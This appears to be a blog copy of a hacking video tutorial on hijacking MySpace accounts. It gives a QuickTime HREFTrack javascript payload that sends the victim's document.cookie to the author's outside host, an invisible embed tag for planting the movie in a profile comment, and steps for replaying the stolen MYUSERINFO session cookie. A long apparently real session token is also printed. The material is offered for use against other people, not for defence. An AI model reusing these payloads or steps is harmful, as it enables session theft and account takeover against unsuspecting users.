Requirements:
A host that allows php hosting and write capabilities
A PHP Cookie Stealer
Quicktime Pro
Today I will show you how to hack myspace through cookie stealing Session Hijacking.
First you must obtain a php cookie stealer. If you dont know how to code in php, you can obtain one in HERE
Lets get Started...
First we obtain a cookie stealer... for thos who dont know how to code in php
Greets to System_meltdown and Hellboundhackers!
Now we craft the quicktime exploit
First we make a textfile with javascript parameters, which will redirect to the cookie stealer.
A<javascript:window.location='http://texasholdem.php0h.com/cookies.php?c='+escape(document.cookie);> T<>
This redirects to my cookie stealer.. as you can see it contains quicktime param.
now that we have it... we need to hide the text. So it doesnt appear and the user doesnt know whats happening.
Go to Window --> Movie Properties and then uncheck the Text Track and rename it HREFTrack.
Now that we have crafted it... we upload to out server.
ok done. now we comment the target.
We will use the embed tag to play the movie (XSS Backdoor), which will redirect to our cookie stealer...
<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src="http://myspace12.php0h.com/exploit.mov" width="0px" height="0px"></embed>
We embed the html code into the comment... as soon as this person sees the comment their cookies are ourS!!!!! hehehehe
Now we just wait.
After a wwhile check the ouputed .htm the php cookie stealer made.. cookies.htm
Now we need MYUSERINFO... which contains all the session data.. once you replce yours with theirs... you have hijacked their session.
That is our victim!!!
Now lets hope weve got it
MEEHHH!
Ok now you need a cookie editor... try to get an extension from mozill'a site.
This is what MYUSERINFO looks like...
MIICzQYKKwYBBAGCN1gDsKCCAr0wggK5BgorBgEEAYI3WAMBoIICqTCCAqUCAwIAAQICZgMCAgDABAgjJvrv1ZyjggQQNaoHyHtftI7v0mKfBu0ZlASCAnjPXXXok6Rlq2Swwxh%2FGEcH1Vbj%2BTcQAaGU6LepzKL1mxNXW8YaHMlbGqhyGJOfAvVk2CK1lxOFKxSDU0DDtbAzMFVu7dsvRwcpBZWnbD10%2Be2eHnrypgzsuZdqL8gKz3G9OlZd19LlcxVZc%2FGm6cndS1GC2MqqFEZAALEckxVFbkCtGX0cehkykIPD3DiN48SLNI4WCjUbTox9lpwPQyeCgw41GibtC%2FKjM%2BeZ2X7EvO%2BZo4OKMOhj8kczUJ63zq0K1MiUBZ%2FI11%2BeEPgtt1dNnEsMNmRw0ND%2BrpiFOeN2SXI03Of3vaG%2BNexc9JbIaE33G6nm%2FWeHnh8QbTj9mVdw3VV%2FhMF2etsfx%2Bi5qEtYZJYGCjRkEkiuVeVgGebEYrrRf4OTq8tpSTSMCc31%2BJBQ%2BOZ82JBYGOz3Vdb1FDH3GMO5KkpawbEz0Mul9A8t3kvGTDluqe%2BCfqhZwy6gGqWKrb6VlRzRwHad1wTgQ5EGZtF%2FQ2w4P0NhQgtdEs%2FK2a7mVwIo2Yl8nF1%2B5Is4FZ4ucLHhJw36GCrXY%2FRoM1r45m2mTYBhKOH58NbqYmW9KqxZpw1cUzi1Qy%2B0pX1LKWbjUobeAaX8Dwsi50cKhtxKRGeXy4haHM444jHH%2Fr904XaYi0%2BQD2wiGvhphUgkgn3IjAV%2FzQcVrnDurRhEn368dmcxExAdUaFx0Cs3hNy8NlkfYWkqherpySB8ijBTfw3sRr1zCaz6JVnmb4on4h3mkX%2BPoC31JAmRtxt74hReASdQfZmcAXUwUJr0sCCMU6KApr8zEU%2FQw%2BbmkJhoeDlLFEmstoyxvYMZPCoS9I%2FEqEJodyoCeIspeg%3D%3D
That is the data we need to replace.
Refresh and.... voila... session hijacked!!!!
but as you ca see you can only do a bit w/ the profile like comment and message.. and edit the profile...
hmm lets see...
hehehe done!!!!
Video made by Insidious
Greets to Bugz and All HBH Users!!!
AIM: insidious888
Hope you had fun!!
HACK MYSPACE WITH COOKIE STEALER (QUICK TIME)
Langganan:
Postingan (Atom)
